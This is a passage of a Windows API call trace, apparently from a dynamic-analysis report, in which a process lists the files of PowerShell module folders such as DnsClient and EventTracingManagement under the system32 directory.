ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.989] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.989] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.990] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0176.990] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.991] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20 [0176.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.993] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0176.993] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0176.993] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0176.995] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.996] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0176.996] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.996] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0176.996] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0176.996] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0176.997] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0176.997] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0176.997] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0176.997] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0176.997] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0176.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.998] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0176.998] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0176.998] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.999] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.001] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0177.001] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.001] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.002] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0177.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.002] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.002] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0177.002] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0177.002] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.012] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0177.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0177.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.014] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0177.014] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.014] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0177.014] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0177.014] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.015] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0177.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.017] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0177.017] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0177.017] FindFirstFileW (in: 